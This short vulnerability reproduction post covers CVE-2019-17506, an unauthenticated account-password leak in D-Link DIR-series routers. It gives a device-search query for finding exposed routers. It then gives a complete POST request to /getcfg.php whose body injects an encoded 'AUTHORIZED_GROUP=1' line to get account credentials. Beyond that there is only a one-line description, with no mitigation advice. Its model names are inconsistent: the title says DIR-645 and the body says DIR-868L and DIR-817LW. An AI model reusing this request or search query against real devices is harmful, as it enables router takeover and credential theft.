D Link Dir 645 Getcfg Php Account Password Leakage Vulnerability Cve 2019 17506
D Link Dir 645 Getcfg Php Account Password Leakage Vulnerability Cve 2019 17506
D-Link Dir-645 getcfg.php Account password leakage vulnerability CVE-2019-17506
Vulnerability Description
D-Link DIR-868L B1-2.03 and DIR-817LW A1-1.04 routers have some web interfaces that do not require authentication.
Vulnerability Impact
D-Link Dir series multiple versions
Network surveying and mapping
app=”D_Link-DIR-868L”
Vulnerability reappears
The login page is as follows
Send the request packet
POST /getcfg.php HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Content-Length: 61
SERVICES=DEVICE.ACCOUNT&attack=ture%0D%0AAUTHORIZED_GROUP%3D1
This post is licensed under CC BY 4.0 by the author.